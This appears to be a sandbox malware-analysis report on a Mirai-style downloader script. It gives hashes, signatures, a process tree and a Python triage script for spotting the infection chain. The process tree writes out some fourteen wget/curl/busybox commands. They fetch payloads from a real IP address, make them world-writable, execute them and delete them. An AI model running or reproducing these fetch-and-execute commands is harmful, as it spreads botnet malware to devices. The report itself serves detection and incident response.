Analysis

max time kernel: 22s
max time network: 23s
platform: debian-9_armhf
resource: debian9-armhf-20240729-en
resource tags: arch:armhf, image:debian9-armhf-20240729-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 21/11/2024, 08:14
Static task: static1

Behavioral tasks (all on sample bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh):
  behavioral1  ubuntu1804-amd64-20240611-en
  behavioral2  debian9-armhf-20240729-en  (the run shown on this page)
  behavioral3  debian9-mipsbe-20240611-en
  behavioral4  debian9-mipsel-20240729-en
General

Target: bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
Size: 10KB
MD5: 77bee17b866cc1fd41dd0e6795516a37
SHA1: fbe900100ffafc804c69a94b5ee81405100c02e5
SHA256: bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f
SHA512: 6284423f5b87140261dee3ec564d00d38f4dd59dd41f86a9d342027230a4012db3224b4cb8e9341a4a30ffcb73b822319b88a65d51c55678886b6a708fa62d4d
SSDEEP: 192:YnrtGG7NhRmOJQM4+2IJ7Rk8UD+u0KCaHHRYbAQrHB+GvrHB+GRnrtGGJNhRmOuX:8NhRmOJQM4+xJ7dfKOAQrHB+GvrHB+Gy
Malware Config
Signatures
File and Directory Permissions Modification (1 TTP, 13 IoCs)
Adversaries may modify file or directory permissions to evade defenses. Every hit here is the script running "chmod 777 <dropped file>" on a freshly downloaded payload immediately before executing it.
  pid   process
  676   chmod
  692   chmod
  735   chmod
  747   chmod
  770   chmod
  783   chmod
  789   chmod
  795   chmod
  801   chmod
  807   chmod
  813   chmod
  819   chmod
  827   chmod

Executes dropped EXE (13 IoCs)
Each entry is a payload downloaded to /tmp and launched by the script as ./<name>.
  pid   ioc / process
  677   /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
  694   /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
  736   /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
  748   /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
  771   /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
  784   /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
  790   /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
  796   /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
  802   /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
  808   /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
  814   /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
  820   /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
  828   /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb

Checks CPU configuration (1 TTP, 13 IoCs)
Checks CPU information which can indicate whether the system is a virtual machine.
  File opened for reading: /proc/cpuinfo  (process: curl, 13 times, once per curl -O invocation)

Reads runtime system information (26 IoCs)
  File opened for reading: /proc/self/auxv  (process: curl, 13 times)
  File opened for reading: /proc/sys/crypto/fips_enabled  (process: curl, 13 times)

Caveat on the two signatures above: every one of these reads is attributed to curl, not to the dropped payloads. Reading /proc/cpuinfo, the auxiliary vector and the FIPS flag is ordinary start-up behaviour of curl's crypto/TLS libraries (CPU feature and FIPS-mode detection), so these hits are a side effect of the script's choice of downloader and say nothing about anti-analysis behaviour in the payloads themselves.

Writes file to tmp directory (13 IoCs)
Malware often drops required files in the /tmp directory. Here the writer is curl -O, running in the script's working directory /tmp; one file per payload:
  File opened for modification: /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n  (curl)
  File opened for modification: /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr  (curl)
  File opened for modification: /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij  (curl)
  File opened for modification: /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR  (curl)
  File opened for modification: /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK  (curl)
  File opened for modification: /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll  (curl)
  File opened for modification: /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD  (curl)
  File opened for modification: /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd  (curl)
  File opened for modification: /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv  (curl)
  File opened for modification: /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI  (curl)
  File opened for modification: /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4  (curl)
  File opened for modification: /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH  (curl)
  File opened for modification: /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb  (curl)
Processes

Process tree for the debian9-armhf run. The script (depth 1) spawns every other process directly (depth 2). The sequence is identical for each payload name: try /usr/bin/wget, then curl -O, then busybox wget against the same URL, chmod 777 the result, execute it from /tmp as ./<name>, delete it, and move on to the next name. Sandbox signatures attach by role: every curl -O carries "Checks CPU configuration", "Reads runtime system information" and "Writes file to tmp directory"; every chmod carries "File and Directory Permissions Modification"; every ./<name> launch carries "Executes dropped EXE". The trace ends at the fourteenth fetch (PID 830) with no curl, chmod or exec after it, consistent with the 22 s kernel time limit.

/tmp/bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh  PID 645
  /bin/rm bins.sh  PID 647

  /usr/bin/wget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n  PID 652
  /usr/bin/curl -O http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n  PID 670
  /bin/busybox wget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n  PID 675
  /bin/chmod 777 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n  PID 676
  /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n (./b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n)  PID 677
  /bin/rm b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n  PID 678

  /usr/bin/wget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr  PID 679
  /usr/bin/curl -O http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr  PID 680
  /bin/busybox wget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr  PID 687
  /bin/chmod 777 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr  PID 692
  /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr (./pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr)  PID 694
  /bin/rm pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr  PID 695

  /usr/bin/wget http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij  PID 696
  /usr/bin/curl -O http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij  PID 721
  /bin/busybox wget http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij  PID 730
  /bin/chmod 777 R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij  PID 735
  /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij (./R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij)  PID 736
  /bin/rm R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij  PID 737

  /usr/bin/wget http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR  PID 738
  /usr/bin/curl -O http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR  PID 739
  /bin/busybox wget http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR  PID 742
  /bin/chmod 777 rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR  PID 747
  /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR (./rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR)  PID 748
  /bin/rm rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR  PID 749

  /usr/bin/wget http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK  PID 751
  /usr/bin/curl -O http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK  PID 757
  /bin/busybox wget http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK  PID 764
  /bin/chmod 777 rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK  PID 770
  /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK (./rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK)  PID 771
  /bin/rm rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK  PID 773

  /usr/bin/wget http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll  PID 774
  /usr/bin/curl -O http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll  PID 781
  /bin/busybox wget http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll  PID 782
  /bin/chmod 777 ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll  PID 783
  /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll (./ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll)  PID 784
  /bin/rm ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll  PID 785

  /usr/bin/wget http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD  PID 786
  /usr/bin/curl -O http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD  PID 787
  /bin/busybox wget http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD  PID 788
  /bin/chmod 777 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD  PID 789
  /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD (./2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD)  PID 790
  /bin/rm 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD  PID 791

  /usr/bin/wget http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd  PID 792
  /usr/bin/curl -O http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd  PID 793
  /bin/busybox wget http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd  PID 794
  /bin/chmod 777 sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd  PID 795
  /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd (./sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd)  PID 796
  /bin/rm sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd  PID 797

  /usr/bin/wget http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv  PID 798
  /usr/bin/curl -O http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv  PID 799
  /bin/busybox wget http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv  PID 800
  /bin/chmod 777 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv  PID 801
  /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv (./7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv)  PID 802
  /bin/rm 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv  PID 803

  /usr/bin/wget http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI  PID 804
  /usr/bin/curl -O http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI  PID 805
  /bin/busybox wget http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI  PID 806
  /bin/chmod 777 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI  PID 807
  /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI (./5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI)  PID 808
  /bin/rm 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI  PID 809

  /usr/bin/wget http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4  PID 810
  /usr/bin/curl -O http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4  PID 811
  /bin/busybox wget http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4  PID 812
  /bin/chmod 777 FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4  PID 813
  /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 (./FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4)  PID 814
  /bin/rm FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4  PID 815

  /usr/bin/wget http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH  PID 816
  /usr/bin/curl -O http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH  PID 817
  /bin/busybox wget http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH  PID 818
  /bin/chmod 777 tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH  PID 819
  /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH (./tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH)  PID 820
  /bin/rm tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH  PID 821

  /usr/bin/wget http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb  PID 822
  /usr/bin/curl -O http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb  PID 823
  /bin/busybox wget http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb  PID 826
  /bin/chmod 777 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb  PID 827
  /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb (./2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb)  PID 828
  /bin/rm 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb  PID 829

  /usr/bin/wget http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN  PID 830  (trace ends here)
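The fetch, chmod 777, execute, delete cycle repeated above is the entire behaviour of this script, and the same stage sequence is what a responder wants to pull out of any such trace, whether it comes from this sandbox or from auditd/eBPF exec events on a compromised device. The Python below is an added example (it is not part of the report and not the sandbox's own code): it parses a flat process list, regroups events by dropped-file name, reports IoCs (download URLs, the host, file names), flags each complete chmod-777-then-execute-then-delete chain, and lists chains the trace cut off. Its input is a constructed excerpt of the process tree above (the first two payload cycles plus the trailing fetch, with the report's PIDs and URLs); the "<pid> <command>" line layout and the list of downloader names are assumptions made for this example, not the sandbox's export format.

```python
# Added example (not from the sandbox report): rebuild a Mirai-style
# downloader's fetch -> chmod -> exec -> rm chains from a flat process list
# and emit IoCs plus per-payload alerts.  The "<pid> <command>" line format
# and the FETCHERS list are assumptions for this example.
import re
from collections import OrderedDict
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s\"']+")
FETCHERS = {"wget", "curl", "tftp", "ftpget"}   # assumed downloader names

# Constructed trace modelled on the process tree above: the script, its first
# two complete payload cycles, and the trailing fetch that never reached
# chmod/exec.  PIDs and URLs are copied from the report.
SAMPLE_TRACE = """\
645 /tmp/bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
647 rm bins.sh
652 wget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
670 curl -O http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
675 /bin/busybox wget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
676 chmod 777 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
677 ./b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
678 rm b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
679 wget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
680 curl -O http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
687 /bin/busybox wget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
692 chmod 777 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
694 ./pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
695 rm pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
830 wget http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
"""


def parse_trace(text):
    """One '<pid> <argv...>' event per line -> list of (pid, argv)."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if line:
            pid, _, cmd = line.partition(" ")
            events.append((int(pid), cmd.split()))
    return events


def _base(path):
    return path.rsplit("/", 1)[-1]


def build_chains(events):
    """Group events by dropped-file basename into fetch/chmod/exec/rm stages."""
    chains = OrderedDict()

    def chain(name):
        return chains.setdefault(
            name, {"fetch": [], "chmod": None, "exec": None, "rm": None})

    for pid, argv in events:
        if not argv:
            continue
        tool = _base(argv[0])
        if tool == "busybox" and len(argv) > 1:      # "/bin/busybox wget URL"
            argv = argv[1:]
            tool = argv[0]
        if tool in FETCHERS:
            for arg in argv[1:]:
                for url in URL_RE.findall(arg):
                    chain(_base(urlparse(url).path))["fetch"].append((pid, tool, url))
        elif tool == "chmod" and len(argv) >= 3:
            chain(_base(argv[-1]))["chmod"] = (pid, argv[1])
        elif tool == "rm" and len(argv) >= 2 and _base(argv[-1]) in chains:
            chains[_base(argv[-1])]["rm"] = pid
        elif argv[0].startswith(("./", "/tmp/")) and _base(argv[0]) in chains:
            chains[_base(argv[0])]["exec"] = pid   # launch of a file we saw dropped
    return chains


def triage(text):
    """IoCs and per-payload alerts for the drop, chmod, exec, delete pattern."""
    chains = build_chains(parse_trace(text))
    urls, hosts, complete, incomplete, alerts = set(), set(), [], [], []
    for name, c in chains.items():
        for _pid, _tool, url in c["fetch"]:
            urls.add(url)
            hosts.add(urlparse(url).hostname)
        if c["fetch"] and c["chmod"] and c["exec"]:
            complete.append(name)
            alerts.append({
                "file": name,
                "chmod_pid": c["chmod"][0], "mode": c["chmod"][1],
                "exec_pid": c["exec"],
                "world_writable": c["chmod"][1] in ("777", "0777", "a+rwx"),
                "self_deleted": c["rm"] is not None,
            })
        else:
            incomplete.append(name)      # e.g. a fetch cut off by the run time limit
    return {"urls": urls, "c2_hosts": hosts, "complete": complete,
            "incomplete": incomplete, "alerts": alerts}


if __name__ == "__main__":
    result = triage(SAMPLE_TRACE)
    print("hosts:", sorted(result["c2_hosts"]))
    print("complete chains:", result["complete"], "incomplete:", result["incomplete"])
    for alert in result["alerts"]:
        print(alert)
```

Running it prints the single host, the two complete chains with their chmod/exec PIDs (676/677 and 692/694) and the cut-off chain for e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN. On real telemetry, feed it exec events in time order and keep the same stage logic: the signal worth alerting on is a file in /tmp that is made world-writable and executable and then launched by the same parent within a few events, with or without the deletion that follows here.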
Network

MITRE ATT&CK Enterprise v15

Downloads

One download body was recorded:
  Filesize: 153B
  MD5: 998368d7c95ea4293237f2320546e440
  SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
  SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
  SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Caveat: 153 bytes is far too small to be the bot binaries the script tries to run, so the "Executes dropped EXE" hits above document the script's behaviour, not a working payload; what the server at 216.126.231.240 actually returned cannot be determined from this report.